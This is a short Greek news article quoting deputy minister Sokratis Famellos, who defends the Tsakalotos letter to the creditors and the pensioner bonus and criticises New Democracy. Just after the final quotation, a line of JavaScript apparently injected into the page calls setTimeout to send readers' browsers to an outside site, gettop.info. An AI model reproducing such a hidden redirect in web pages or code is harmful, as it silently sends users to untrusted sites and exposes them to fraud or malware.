Φάμελλος: Δεν ζητήσαμε συγγνώμη από τους δανειστές

0
9

 

Δεν ζητήσαμε συγγνώμη από τους δανειστές. Κερδισμένοι είναι οι συνταξιούχοι και οι κάτοικοι των νησιών», δήλωσε στον focus fm 103,6 της Θεσσαλονίκης, ο αναπληρωτής υπουργός Περιβάλλοντος και Ενέργειας, Σωκράτης Φάμελλος, αναφερόμενος στην επιστολή Τσακαλώτου στους θεσμούς, τονίζοντας: «Η επιστολή Τσακαλώτου δημοσιοποιήθηκε από την κυβέρνηση. Δεν έχουμε τίποτα να φοβηθούμε«.

«Εκτεθειμένη είναι η ΝΔ. Η αντιπολίτευση για να πάρει πίσω μια καρέκλα συμμαχεί με τους συντηρητικότερους κύκλους των δανειστών», υπογράμμισε ο κ. Φάμελλος και συμπλήρωσε: »Οι συνταξιούχοι ξέρουν ότι είδαν στις 22 Δεκεμβρίου αυτό που τους υποσχέθηκε η κυβέρνηση, το έκτακτο βοήθημα. Είτε το λέμε 13η σύνταξη, είτε όχι, εγώ ξέρω ότι καλά κάναμε και το δώσαμε. Χωρίς η χώρα να δώσει κάτι παραπάνω και χωρίς να μπει φρένο στα μέτρα για το χρέος, ωφελήθηκαν συνταξιούχοι και νησιά.

Η κυβέρνηση κατοχυρώνει με την επιστολή Τσακαλώτου ότι το πρωτογενές πλεόνασμα θα πηγαίνει στους αδύναμους ως κοινωνικό εισόδημα αλληλεγγύης και στη φοροελάφρυνση των επαγγελματιών». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here